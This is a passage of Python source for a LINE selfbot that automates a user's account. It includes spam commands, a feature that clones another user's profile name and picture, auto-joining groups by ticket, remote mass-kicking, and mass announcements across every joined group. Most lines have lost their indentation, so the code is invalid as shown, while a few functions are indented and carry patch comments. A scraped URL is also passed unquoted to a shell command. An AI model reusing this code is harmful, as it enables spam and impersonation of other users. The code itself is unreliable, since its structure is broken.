return threading.Thread(target=self.sendGIF, args=(to,'sticker.gif',)).start()
self.sendImageWithURL(to,'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/ANDROID/sticker.png')
if msg.contentType == 0:
if msg.text is None:
return
if 'MENTION' in msg.contentMetadata:
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if self.getProfile().mid in mention["M"]:
if to not in wait['ROM']:
wait['ROM'][to] = {}
if msg._from not in wait['ROM'][to]:
wait['ROM'][to][msg._from] = {}
if 'msg.id' not in wait['ROM'][to][msg._from]:
wait['ROM'][to][msg._from]['msg.id'] = []
if 'waktu' not in wait['ROM'][to][msg._from]:
wait['ROM'][to][msg._from]['waktu'] = []
wait['ROM'][to][msg._from]['msg.id'].append(msg.id)
wait['ROM'][to][msg._from]['waktu'].append(msg.createdTime)
self.autoresponuy(msg,wait)
break
if '/ti/g/' in msg.text:
if wait["autoJoin"] == True:
try:
link_re = re.compile(r'(?:line:/|line\.me/R)/ti/g/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group=self.findGroupByTicket(ticket_id)
g = self.getGroup(group.id)
h = []
for d in g.members:
h.append(d.mid)
self.acceptGroupInvitationByTicket(group.id,ticket_id)
except:pass
if msg.text.lower() == 'respon':
if msg._from in ['u2286e272840491415e82447163dadf6c']:
self.sendMention(to,'@!','',[self.profile.mid])
if msg.text.lower() == 'cleartmp':
if msg._from in ['u2286e272840491415e82447163dadf6c']:
self.sendMessage(to,'Successfully cleared the temp data.')
wait["lurkt"],wait["lurkp"],wait["ROM"],wait["ROM1"],wait["setTime"],wait["readPoint"],wait["readPoints"],wait['Unsend']={},{},{},{},{},{},{},{}
time.sleep(3)
self.sendMessage(to,'Success.')
self.restart_program()
if msg.text.lower().startswith('delsb '):
if msg._from in ['u2286e272840491415e82447163dadf6c']:
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if self.getProfile().mid in mention["M"]:
self.kusumu(msg)
def eksekusipc(self,to,wait,dits,msg):
if msg.toType == 2:
return
if dits == 'addbl':self.datamentions(msg,'Blacklist',[to],'ADDBL',wait,ps='\n├ Type: Add Blacklist')
elif dits == 'delbl':self.datamentions(msg,'Blacklist',[to],'DELBL',wait,ps='\n├ Type: Delete Blacklist')
elif dits == 'addwl':self.datamentions(msg,'Whitelist',[to],'ADDWL',wait,ps='\n├ Type: Add Whitelist')
elif dits == 'delwl':self.datamentions(msg,'Whitelist',[to],'DELWL',wait,ps='\n├ Type: Delete Whitelist')
elif dits == 'addml':self.datamentions(msg,'Mimiclist',[to],'ADDML',wait,ps='\n├ Type: Add Mimiclist')
elif dits == 'delml':self.datamentions(msg,'Mimiclist',[to],'DELML',wait,ps='\n├ Type: Delete Mimiclist')
def debug(self):
get_profile_time_start = time.time()
get_profile = self.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = self.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = self.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
return " 「 Debug 」\nType:\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/2,get_contact_time/2,get_group_time/2)
def findcont(self,msg):
if 'MENTION' in msg.contentMetadata:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
a = self.getGroupIdsJoined();i = self.getGroups(a)
c = []
for h in i:
g = [c.append(h.name[0:20]+',.s/'+str(len(h.members))) for d in h.members if key1 in d.mid]
h = "╭「 Find Contact 」─"
no=0
for group in c:
no+=1
h+= "\n│{}. {} | {}".format(no, group.split(',.s/')[0], group.split(',.s/')[1])
self.sendMessage(msg.to,h+"\n╰─「 Found in {} Groups 」".format(len(c)))
def autoaddekseuki(self,op,wait):
if(wait["autoaddpesan"] in [""," ","\n",None]):
return
if '@!' not in wait["autoaddpesan"]:
wait["autoaddpesan"] = '@!'+wait["autoaddpesan"]
sd = self.waktunjir()
self.sendMention(op.param1,wait["autoaddpesan"].replace('greeting',sd),' 「 Autoadd 」\n',[op.param1]*wait["autoaddpesan"].count('@!'))
if wait["autoAdd"] == True:self.findAndAddContactsByMid(op.param1)
def mimicon(self,wait):
if wait['status'] == True:
msgs=" 「 Mimic 」\nMimic already ENABLED♪"
else:
msgs=" 「 Mimic 」\nMimic set to ENABLED♪"
wait["status"] = True
return msgs
def mimicoff(self,wait):
wait['GN'] = ''
if wait['status'] == False:
msgs=" 「 Mimic 」\nMimic already DISABLED♪"
else:
msgs=" 「 Mimic 」\nMimic set to DISABLED♪"
wait["status"] = False
return msgs
@loggedIn
def sendContact(self, to, mid):
contentMetadata = {'mid': mid}
return self.sendMessage(to, '', contentMetadata, 13)
def waktu(self,secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Days %02d Hours %02d Minutes %02d Seconds' % (days, hours, mins, secs)
def about(self,wait,msg,waita):
if wait["setkey"] == '':
dit = '\nPrefix: Disable'
else:
dit = "\nPrefix:"+wait["setkey"]
ti = waita['name'][waita["info"][msg._from]]["pay"]-time.time()
sec = int(ti %60)
minu = int(ti/60%60)
hours = int(ti/60/60 %24)
days = int(ti/60/60/24)
text = " 「 About 」\n'''Free Self Bot Edition'''\nExpired on {}\nIn: {} Days {} Hours {} Minutes {} Seconds{}\nClient Name: @!\nFind me here @!".format(humanize.naturaltime(datetime.fromtimestamp(waita['name'][waita['info'][msg._from]]["pay"])) ,days,hours,minu,sec,dit)
self.sendMention(msg.to,text,'',[self.getProfile().mid, 'uac8e3eaf1eb2a55770bf10c3b2357c33'])
self.sendContact(msg.to,self.getProfile().mid)
def abouts(self,wait,waita):
dd = self.getProfile().mid
if wait["setkey"] == '':
dit = '\nKey: Disable'
else:
dit = "\nKey:"+wait["setkey"]
ti = waita['name'][waita["info"][dd]]["pay"]-time.time()
sec = int(ti %60)
minu = int(ti/60%60)
hours = int(ti/60/60 %24)
days = int(ti/60/60/24)
text = " 「 LOGIN 」\n'Self' Edition♪\n「 Subscription 」\nExpired: {}\nIn: {} days {} hours {} min{}\nName: @!\nVersion: 2.7\nOwner: @!".format(humanize.naturaltime(datetime.fromtimestamp(waita['name'][waita['info'][dd]]["pay"])) ,days,hours,minu,dit)
self.sendMention(waita['name'][waita["info"][dd]]["tempat"],text,'',[dd, 'u2286e272840491415e82447163dadf6c'])
waita['name'][waita["info"][dd]]["tempat"] = ''
with open('backup.json', 'w') as fp:
json.dump(waita, fp, sort_keys=True, indent=4)
def mysticker(self,msg):
a = self.shop.getActivePurchases(start=0, size=1000, language='ID', country='ID').productList
c = "List Download Sticker:"
no = 0
for b in a:
no +=1
c += "\n"+str(no)+". "+b.title[:21]+" ID:"+str(b.packageId)
k = len(c)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(c[aa*10000 : (aa+1)*10000]))
def listgroup(self,msg,wait):
ddd = wait["setkey"]
gid = self.getGroupIdsJoined()
sd = self.getGroups(gid)
ret = "╭「 Groups 」─"
no = 0
total = len(gid)
cd = "\n│ Total {} Groups\n│\n├─「 COMMAND 」\n│\n│ Remote Mention\n│ Key:{} grouplist [num] tag [1|<|>|-]\n│ Remote Kick\n│ Key:{} grouplist [num] kick [1|<|>|-]\n│ Leave Groups\n│ Key:{} leave groups [1|<|>|-]\n│ Get QR\n│ Key:{} qr groups [1|<|>|-]\n│ Cek Member\n│ Key:{} grouplist [num]\n╰ Key:{} grouplist [num] mem [num]".format(total,ddd,ddd,ddd,ddd,ddd,ddd)
for G in sd:
member = len(G.members)
no += 1
ret += "\n│{}. {} | {}".format(no, G.name[0:20], member)
ret += cd
k = len(ret)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(ret[aa*10000 : (aa+1)*10000]))
def listsquare(self):
s = self.getJoinedSquares(continuationToken=None, limit=50)
a = [a.name+'./,.'+a.mid for a in s.squares];b = [s.statuses[a[b].split('./,.')[1]].memberCount for b in range(len(a))];c = ['{} | {}'.format(a[i].split('./,.')[0],humanize.intcomma(b[i])) for i in range(len(a))];c.sort()
no = 0
h = "╭「 Square 」─"
for i in c:
no+=1
h+= '\n│{}. {}'.format(no,i)
return h+"\n╰─「 Total {} Square 」".format(len(a))
def stacks(self,to):
start = time.time()
a = [self.sendMessage(to,"- Taken: %.10f" % (time.time() - start)) for a in range(50)]
def speed(self,to):
start = time.time()
self.sendMessage("uac8e3eaf1eb2a55770bf10c3b2357c33", ' ')
elapsed_time = time.time() - start
took = time.time() - start
self.sendMessage(to," 「 Speed 」\nType: Speed\n - Took : %.3fms\n - Taken: %.10f" % (took,elapsed_time))
def setautojoinm(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
wait["Members"] = int(msg.text.split(" ")[2])
self.sendMessage(msg.to, " 「 Autojoin 」\nType: Minim Members\nStatus: Success Set\nTo: {} Members".format(wait["Members"]))
def adityeksekusidata(self,msg,wait):
a = []
a.append(msg.contentMetadata["mid"])
to = msg.to
if wait["wwhitelist"] == True:
self.datamentions(msg,'Whitelist',a,'ADDWL',wait,ps='\n├ Type: Add Whitelist')
wait["wwhitelist"] = False
if wait["wblacklist"] == True:
self.datamentions(msg,'Blacklist',a,'ADDBL',wait,ps='\n├ Type: Add Blacklist')
wait["wblacklist"] = False
if wait["dwhitelist"] == True:
self.datamentions(msg,'Whitelist',a,'DELWL',wait,ps='\n├ Type: Delete Whitelist')
wait["dwhitelist"] = False
if wait["dblacklist"] == True:
self.datamentions(msg,'Blacklist',a,'DELBL',wait,ps='\n├ Type: Delete Blacklist')
wait["dblacklist"] = False
if wait["Anime"] == True:
self.datamentions(msg,'Friendlist',a,'DELFL',wait,ps='\n├ Type: Delete Friendlist')
wait["Anime"] = False
def autoJoinoff(self,wait,msg):
if wait['autoJoin'] == False:
msgs=" 「 Auto Join 」\nAuto Join already set to DISABLED♪"
else:
msgs=" 「 Auto Join 」\nAuto Join has been set to DISABLED♪"
wait['autoJoin']=False
self.sendMessage(msg.to, msgs)
def autoJoinon(self,wait,msg):
if wait['autoJoin'] == True:
msgs=" 「 Auto Join 」\nAuto Join already set to ENABLED♪"
else:
msgs=" 「 Auto Join 」\nAuto Join has been set to ENABLED♪"
wait['autoJoin']=True
self.sendMessage(msg.to, msgs)
def autoreadon1(self,data):
if data['autoread1'] == True:
msgs=" 「 Auto Read 」\nAuto Read Personal already ENABLED♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Personal set to ENABLED♪\nNote: Auto Read message is not affected♪"
data['autoread1']= True
return msgs
def autoreadoff1(self,data):
if data['autoread1'] == False:
msgs=" 「 Auto Read 」\nAuto Read Personal already DISABLED♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Personal set to DISABLED♪\nNote: Auto Read message is not affected♪"
data['autoread1']=False
return msgs
def autoreadoff2(self,data):
if data['autoread2'] == False:
msgs=" 「 Auto Read 」\nAuto Read Group already DISABLED♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Group set to DISABLED♪\nNote: Auto Read message is not affected♪"
data['autoread2']=False
return msgs
def autoreadon2(self,data):
if data['autoread2'] == True:
msgs=" 「 Auto Read 」\nAuto Read Group already ENABLED♪\nNote: Auto Read message is not affected♪"
else:
msgs=" 「 Auto Read 」\nAuto Read Group set to ENABLED♪\nNote: Auto Read message is not affected♪"
data['autoread2']= True
return msgs
def autoread(self,data):
if data["autoread2"] == True:a = "True"
else:a = "False"
if data["autoread1"] == True:b = "True"
else:b = "False"
return " 「 Auto Read 」\nEvent Trigger:\n on Personal: "+b+"\n on Group: "+a+"\n\nCommand:\n Autoread\n Usage:"+data["setkey"].title()+" autoread [on|off]"
def help(self,msg,wait):
if wait["setkey"] == '':ab = ''
else:ab = wait["setkey"] + ' '
a =" ╔══[「нєℓρ мєѕѕαgє」]\n" \
"╠ 1. "+ab+"Mentionz\n" \
"╠ 2. "+ab+"Broadcastz\n" \
"╠ 3. "+ab+"Lurk\n" \
"╠ 4. "+ab+"Autoread\n" \
"╠ 5. "+ab+"Group\n" \
"╠ 6. "+ab+"Friendz\n" \
"╠ 7. "+ab+"Disguise\n" \
"╠ 8. "+ab+"Spamz\n" \
"╠ 9. "+ab+"Stealz\n" \
"╠ 10. "+ab+"Autojoinz\n" \
"╠ 11. "+ab+"Autoaddz\n" \
"╠ 12. "+ab+"Announcez\n" \
"╠ 13. "+ab+"Profilez\n" \
"╠ 14. "+ab+"Media\n" \
"╠ 15. "+ab+"Settz\n" \
"╠ 16. "+ab+"Logout sb\n" \
"╠ 17. "+ab+"Restart\n" \
"╠ 18. "+ab+"Prefix\n"\
"╚══[ 🎬Fe-𝔫α ]\n"
zxc = a.title()+"ㄔSmileBots : Fen\nㄔReworked by @!\n"
return self.sendMention(msg.to,zxc.strip(),' 「 HELP 」',['u2286e272840491415e82447163dadf6c'])
@loggedIn
def removeChatRoomAnnouncement(self, chatRoomMid, announcementSeq):
return self.talk.removeChatRoomAnnouncement(0, chatRoomMid, announcementSeq)
def getannoun(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
to = msg.to
a = self.getChatRoomAnnouncements(msg.to)
if a == []:
self.sendMention(to, 'Sorry @! No announcements found in {}'.format(self.getGroup(to).name),' 「 Announcements 」\n', [self.getProfile().mid])
return
c = ' 「 Announcements 」'
no = 0
h = []
ds = [a[b].creatorMid for b in range(len(a)) if a[b].creatorMid not in h]
if msg.text.lower() == 'get announ':
for b in a:
if b.creatorMid not in h:
h.append(b.creatorMid)
no += 1
c += "\n{}. @! #{}x".format(no,str(a).count(b.creatorMid))
self.sendMention(msg.to,c,'',h)
if msg.text.lower().startswith("get announ "):
if len(msg.text.split(' ')) == 3:
sd = ds[int(msg.text.split(' ')[2])-1]
c+= '\nAnnounced by: @!'
no=0
for b in a:
if b.contents.link != None:
if b.creatorMid in sd:
no+=1
if 'line://nv/chatMsg?chatId=' in b.contents.link:sdg = '{}'.format(b.contents.link)
else:sdg = '{}'.format(b.contents.text)
if no == 1:c+= '\n{}. 「 {} 」\n{}'.format(no,humanize.naturaltime(datetime.fromtimestamp(b.createdTime/1000)),sdg)
else:c+= '\n\n{}. 「 {} 」\n{}'.format(no,humanize.naturaltime(datetime.fromtimestamp(b.createdTime/1000)),sdg)
self.sendMention(msg.to,c,'',[sd])
def mangakyo(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'mangakyo':self.sendMessage(msg.to,AdityaMangakyo())
if msg.text.lower().startswith('mangakyo page '):
if self.adityasplittext(msg.text,'s') == '1':return self.sendMessage(msg.to,'Page 1 not found, the next pages start from 2')
self.sendMessage(msg.to,AdityaMangakyo(self.adityasplittext(msg.text,'s')))
def templatemusic(self,img,text,stext):
a = self.profile.userid
contentMetadata={
'subText': stext,
'countryCode': 'ID',
'a-packageName': 'com.spotify.music',
'previewUrl': img, 'text': text,
'linkUri': 'line://ti/p/~{}'.format(a),
'id': 'mt000000000a6b79f9',
'i-installUrl': 'line://ti/p/~{}'.format(a)
, 'type': 'mt', 'a-installUrl': 'line://ti/p/~{}'.format(a), 'i-linkUri': 'line://ti/p/~{}'.format(a), 'a-linkUri': 'line://ti/p/~{}'.format(a)}
return contentMetadata
def createannoun(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'announ clear':
a = self.getChatRoomAnnouncements(msg.to)
try:
for b in a:
self.removeChatRoomAnnouncement(msg.to,b.announcementSeq)
self.sendMessage(msg.to, 'Done')
except Exception as e:
ee = traceback.format_exc()
self.sendMessage(msg.to, '{}'.format(e))
else:
adit = ChatRoomAnnouncementContents()
adit.text = self.adityasplittext(msg.text,'ss')
try:adit.link= 'line://ti/p/~{}'.format(self.profile.userid)
except:adit.link = 'line://ti/p/tzNPFGlbKW'
adit.displayFields = 1
try:
adit.thumbnail = "http://dl.profile.line-cdn.net/"+ self.getGroup(msg.to).pictureStatus
except:
adit.thumbnail = 'https://adityapypi-api-id.herokuapp.com/static/lang-logo.png'
if msg.text.lower().startswith('announ create lock '):self.createChatRoomAnnouncement(msg.to,1,adit)
if msg.text.lower().startswith('announ create unlock '):self.createChatRoomAnnouncement(msg.to,0,adit)
if msg.text.lower().startswith('announ create all '):
a = self.getGroupIdsJoined()
for i in a:
G = self.getGroup(i).pictureStatus
adit.thumbnail = "http://dl.profile.line-cdn.net/"+ G
self.createChatRoomAnnouncement(i,1,adit)
self.sendMessage(msg.to,' 「 Announcements 」\nStatus: Success Announcement')
def mykeyset(self,t,wait):wait["setkey"] = t.split(' ')[0];return " 「 Rname 」\nKey has been set to "+wait["setkey"].title()
def clearfriend(self,msg):
n = len(self.getAllContactIds())
try:
self.clearContacts()
except:
pass
t = len(self.getAllContactIds())
self.findAndAddContactsByMid('u2286e272840491415e82447163dadf6c')
self.sendMessage(msg.to,"Friends before: %s\nFriends after: %s\nTotal removed: %s"%(n,t,(n-t)))
def clearContacts(self):
t = self.getContacts(self.getAllContactIds())
for n in t:
try:
self.AdityadeleteContact(n.mid)
except:
pass
pass
def refreshContacts(self):
contact_ids = self.getAllContactIds()
contacts = self.getContacts(contact_ids)
contacts = [contact.displayName+',./;'+contact.mid for contact in contacts]
contacts.sort()
contacts = [a.split(',./;')[1] for a in contacts]
return contacts
def AdityadeleteContact(self, contact):
try:
self.talk.updateContactSetting(16,contact,ContactSetting.CONTACT_SETTING_DELETE,'True')
except:
traceback.print_exc()
pass
@loggedIn
def acquireEncryptedAccessToken(self, featureType=2):
return self.talk.acquireEncryptedAccessToken(featureType)
@loggedIn
def getProfile(self):
return self.talk.getProfile()
@loggedIn
def getSettings(self):
return self.talk.getSettings()
@loggedIn
def getUserTicket(self):
return self.talk.getUserTicket()
@loggedIn
def updateProfile(self, profileObject):
return self.talk.updateProfile(0, profileObject)
@loggedIn
def updateSettings(self, settingObject):
return self.talk.updateSettings(0, settingObject)
@loggedIn
def updateProfileAttribute(self, attrId, value):
return self.talk.updateProfileAttribute(0, attrId, value)
"""Operation"""
@loggedIn
def fetchOperation(self, revision, count):
return self.talk.fetchOperations(revision, count)
@loggedIn
def getLastOpRevision(self):
return self.talk.getLastOpRevision()
"""Message"""
@loggedIn
def sendMessage(self, to, text, contentMetadata={}, contentType=0):
msg = Message()
msg.to, msg._from = to, self.profile.mid
msg.text = text
msg.contentType, msg.contentMetadata = contentType, contentMetadata
if to not in self._messageReq:
self._messageReq[to] = -1
self._messageReq[to] += 1
return self.talk.sendMessage(self._messageReq[to], msg)
@loggedIn
def sendSticker(self, to, packageId, stickerId):
contentMetadata = {
'STKVER': '100',
'STKPKGID': packageId,
'STKID': stickerId
}
return self.sendMessage(to, '', contentMetadata, 7)
@loggedIn
def sendContact(self, to, mid):
contentMetadata = {'mid': mid}
return self.sendMessage(to, '', contentMetadata, 13)
@loggedIn
def sendGift(self, to, productId, productType):
if productType not in ['theme','sticker']:
raise Exception('Invalid productType value')
contentMetadata = {
'MSGTPL': str(randint(0, 12)),
'PRDTYPE': productType.upper(),
'STKPKGID' if productType == 'sticker' else 'PRDID': productId
}
return self.sendMessage(to, '', contentMetadata, 9)
@loggedIn
def sendMessageAwaitCommit(self, to, text, contentMetadata={}, contentType=0):
msg = Message()
msg.to, msg._from = to, self.profile.mid
msg.text = text
msg.contentType, msg.contentMetadata = contentType, contentMetadata
if to not in self._messageReq:
self._messageReq[to] = -1
self._messageReq[to] += 1
return self.talk.sendMessageAwaitCommit(self._messageReq[to], msg)
@loggedIn
def generateReplyMessage(self, relatedMessageId):
msg = Message()
msg.relatedMessageServiceCode = 1
msg.messageRelationType = 3
msg.relatedMessageId = str(relatedMessageId)
return msg
@loggedIn
def sendReplyMessage(self, relatedMessageId, to, text, contentMetadata={}, contentType=0):
msg = self.generateReplyMessage(relatedMessageId)
msg.to = to
msg.text = text
msg.contentType = contentType
msg.contentMetadata = contentMetadata
if to not in self._messageReq:
self._messageReq[to] = -1
self._messageReq[to] += 1
return self.talk.sendMessage(self._messageReq[to], msg)
@loggedIn
def unsendMessage(self, messageId):
self._unsendMessageReq += 1
return self.talk.unsendMessage(self._unsendMessageReq, messageId)
@loggedIn
def requestResendMessage(self, senderMid, messageId):
return self.talk.requestResendMessage(0, senderMid, messageId)
@loggedIn
def respondResendMessage(self, receiverMid, originalMessageId, resendMessage, errorCode):
return self.talk.respondResendMessage(0, receiverMid, originalMessageId, resendMessage, errorCode)
@loggedIn
def removeMessage(self, messageId):
return self.talk.removeMessage(messageId)
@loggedIn
def removeAllMessages(self, lastMessageId):
return self.talk.removeAllMessages(0, lastMessageId)
@loggedIn
def getBlockedRecommendationIds(self):
return self.talk.getBlockedRecommendationIds()
@loggedIn
def getRecommendationIds(self):
return self.talk.getFriendRequests(FriendRequestDirection.OUTGOING,1)
@loggedIn
def removeMessageFromMyHome(self, messageId):
return self.talk.removeMessageFromMyHome(messageId)
@loggedIn
def destroyMessage(self, chatId, messageId, sessionId=0):  # sessionId default of 0 is an assumption; it was previously an undefined name
    return self.talk.destroyMessage(0, chatId, messageId, sessionId)
@loggedIn
def sendChatChecked(self, consumer, messageId):
return self.talk.sendChatChecked(0, consumer, messageId)
@loggedIn
def sendEvent(self, messageObject):
return self.talk.sendEvent(0, messageObject)
@loggedIn
def getLastReadMessageIds(self, chatId):
return self.talk.getLastReadMessageIds(chatId)
@loggedIn
def getPreviousMessagesV2WithReadCount(self, messageBoxId, endMessageId, messagesCount=50):
return self.talk.getPreviousMessagesV2WithReadCount(messageBoxId, endMessageId, messagesCount)
"""Object"""
@loggedIn
def sendImage(self, to, path,texk='Image'):
objectId = self.sendMessage(to=to, text=None,contentMetadata={'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath, 'AGENT_NAME': texk, 'AGENT_LINK': 'line://ti/p/~{}'.format(self.getProfile().userid)}, contentType = 1).id
return self.uploadObjTalk(path=path, type='image', returnAs='bool', objId=objectId)
@loggedIn
def sendImageWithURL(self, to, url,texk='Image'):
path = self.downloadFileURL(url, 'path')
return self.sendImage(to, path,texk)
def soundcloud(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("soundcloud "):
kitsunesplit = self.adityasplittext(msg.text.lower()).split("|")
r = requests.get('https://soundcloud.com/search?q={}'.format(self.adityasplittext(msg.text.lower())))
soup = BeautifulSoup(r.text,'html5lib')
data = soup.find_all(class_='soundTitle__titleContainer')
data = soup.select('li > h2 > a')
if len(kitsunesplit) == 1:
a = ' 「 Soundcloud 」';no=0
for b in data:
no+=1
a+= '\n{}. {}'.format(no,b.text)
self.sendMessage(msg.to,a)
if len(kitsunesplit) == 2:
a = data[int(kitsunesplit[1])-1];b = list(a)[0]
kk = random.randint(0,999)
self.sendMessage(msg.to,' 「 Soundcloud 」\nJudul: {}\nStatus: Waiting... For Upload'.format(a.text), self.templatefoot('https://soundcloud.com{}'.format(a.get('href')),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,a.text))
hh=subprocess.getoutput('youtube-dl --extract-audio --audio-format mp3 --output {}.mp3 {}'.format(kk,'https://soundcloud.com{}'.format(a.get('href'))))
try:self.sendAudio(msg.to,'{}.mp3'.format(kk))
except Exception as e:self.sendMessage(msg.to,' 「 ERROR 」\nJudul: {}\nStatus: {}\nImportant: Try again'.format(a.text,e), self.templatefoot('https://soundcloud.com{}'.format(a.get('href')),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,a.text))
os.remove('{}.mp3'.format(kk))
def imagegoogle(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
to = msg.to
data = self.image_search(self.adityasplittext(msg.text))
try:
a = data['ou']
if '.gif' in a:
return self.sendGIFWithURL(to,a)
self.sendImageWithURL(to,a,'Google Image')
return self.sendMention(to,' 「 Image 」\nInfo: Hi @! here is a random pick from the first 100 results','',[msg._from])
except Exception as e:
self.sendMessage(to,' 「 Error 」\nStatus:\n{}'.format(e))
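# Scrapes Google Image search results and returns the metadata JSON of one randomly chosen result.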
def image_search(self, query):
query = query.replace(' ', "%20")
url = "https://www.google.com/search?hl=en&site=imghp&tbm=isch&tbs=isz:l&q=" + query
mozhdr = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"}
req = requests.get(url, headers = mozhdr)
soupeddata = BeautifulSoup(req.content , "lxml")
images = soupeddata.find_all("div", {"class": "rg_meta notranslate"})
aa = random.randint(0,len(images)-1)
try:
images = json.loads(images[aa].text)
return images
except Exception as e:return e
def imageart(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
to = msg.to
data = self.adityarequestweb("https://www.artstation.com/search/projects.json?direction=desc&order=published_at&page=1&q={}&show_pro_first=true".format(self.adityasplittext(msg.text)))
aa = random.randint(0,len(data['data'])-1)
try:
a = data['data'][aa]['cover']['medium_image_url']
self.sendImageWithURL(to,a,'Artstation')
if data['data'][aa]['description'] != '':sdf = '\nDescription: {}'.format(data['data'][aa]['description'])
else:sdf = ''
self.sendMention(to,' 「 Image 」\n | INFO |\nTitle: {}{}\nImportant: Okay @! I picked image #{} of #{}'.format(data['data'][aa]['title'],sdf,aa+1,data['total_count']),data['data'][aa]['title'],[msg._from])
except Exception as e:
self.sendMessage(to,' 「 Error 」\nStatus:\n{}'.format(e))
@loggedIn
def sendGIF(self, to, path):
return self.uploadObjTalk(path=path, type='gif', returnAs='bool', to=to)
@loggedIn
def sendGIFWithURL(self, to, url):
path = self.downloadFileURL(url, 'path')
return self.sendGIF(to, path)
@loggedIn
def sendVideo(self, to, path):
objectId = self.sendMessage(to=to, text=None, contentMetadata={'VIDLEN': '60000','DURATION': '60000'}, contentType = 2).id
return self.uploadObjTalk(path=path, type='video', returnAs='bool', objId=objectId)
@loggedIn
def sendVideoWithURL(self, to, url):
path = self.downloadFileURL(url, 'path')
return self.sendVideo(to, path)
@loggedIn
def sendAudio(self, to, path):
objectId = self.sendMessage(to=to, text=None, contentType = 3).id
return self.uploadObjTalk(path=path, type='audio', returnAs='bool', objId=objectId)
@loggedIn
def sendAudioWithURL(self, to, url):
path = self.downloadFileURL(url, 'path')
return self.sendAudio(to, path)
@loggedIn
def sendFile(self, to, path, file_name='', ct=''):
    # Resolve the file name and size before building the metadata, so FILE_SIZE is always defined.
    if file_name == '':
        file_name = ntpath.basename(path)
    file_size = len(open(path, 'rb').read())
    if ct == '':
        ct = {'FILE_NAME': str(file_name), 'FILE_SIZE': str(file_size)}
    objectId = self.sendMessage(to=to, text=None, contentMetadata=ct, contentType=14).id
    return self.uploadObjTalk(path=path, type='file', returnAs='bool', objId=objectId)
@loggedIn
def sendFileWithURL(self, to, url, fileName=''):
path = self.downloadFileURL(url, 'path')
return self.sendFile(to, path, fileName)
"""Contact"""
@loggedIn
def blockContact(self, mid):
return self.talk.blockContact(0, mid)
@loggedIn
def unblockContact(self, mid):
return self.talk.unblockContact(0, mid)
@loggedIn
def findAndAddContactByMetaTag(self, userid, reference):
return self.talk.findAndAddContactByMetaTag(0, userid, reference)
@loggedIn
def findAndAddContactsByMid(self, mid):
return self.talk.findAndAddContactsByMid(0, mid,5,'')
@loggedIn
def findAndAddContactsByEmail(self, emails=[]):
return self.talk.findAndAddContactsByEmail(0, emails)
@loggedIn
def findAndAddContactsByUserid(self, userid):
return self.talk.findAndAddContactsByUserid(0, userid)
@loggedIn
def findContactsByUserid(self, userid):
return self.talk.findContactByUserid(userid)
@loggedIn
def findContactByTicket(self, ticketId):
return self.talk.findContactByUserTicket(ticketId)
@loggedIn
def getAllContactIds(self):
return self.talk.getAllContactIds()
@loggedIn
def getBlockedContactIds(self):
return self.talk.getBlockedContactIds()
@loggedIn
def getContact(self, mid):
return self.talk.getContact(mid)
@loggedIn
def getContacts(self, midlist):
return self.talk.getContacts(midlist)
@loggedIn
def getFavoriteMids(self):
return self.talk.getFavoriteMids()
@loggedIn
def getHiddenContactMids(self):
return self.talk.getHiddenContactMids()
@loggedIn
def tryFriendRequest(self, midOrEMid, friendRequestParams, method=1):
return self.talk.tryFriendRequest(midOrEMid, method, friendRequestParams)
@loggedIn
def makeUserAddMyselfAsContact(self, contactOwnerMid):
return self.talk.makeUserAddMyselfAsContact(contactOwnerMid)
@loggedIn
def getContactWithFriendRequestStatus(self, id):
return self.talk.getContactWithFriendRequestStatus(id)
@loggedIn
def reissueUserTicket(self, expirationTime=100, maxUseCount=100):
return self.talk.reissueUserTicket(expirationTime, maxUseCount)
@loggedIn
def cloneContactProfile(self, mid):
contact = self.getContact(mid)
profile = self.profile
self.updateProfileAttribute(2, contact.displayName)
self.updateProfileAttribute(16, contact.statusMessage)
if self.getProfileCoverId(mid) is not None:
self.updateProfileCoverById(self.getProfileCoverId(mid))
path = self.downloadFileURL("http://dl.profile.line-cdn.net/"+contact.picturePath, 'path')
self.updateProfilePicture(path)
return
"""Group"""
@loggedIn
def getChatRoomAnnouncementsBulk(self, chatRoomMids):
return self.talk.getChatRoomAnnouncementsBulk(chatRoomMids)
@loggedIn
def getChatRoomAnnouncements(self, chatRoomMid):
return self.talk.getChatRoomAnnouncements(chatRoomMid)
@loggedIn
def createChatRoomAnnouncement(self, chatRoomMid, type, contents):
return self.talk.createChatRoomAnnouncement(0, chatRoomMid, type, contents)
@loggedIn
def removeChatRoomAnnouncement(self, chatRoomMid, announcementSeq):
return self.talk.removeChatRoomAnnouncement(0, chatRoomMid, announcementSeq)
@loggedIn
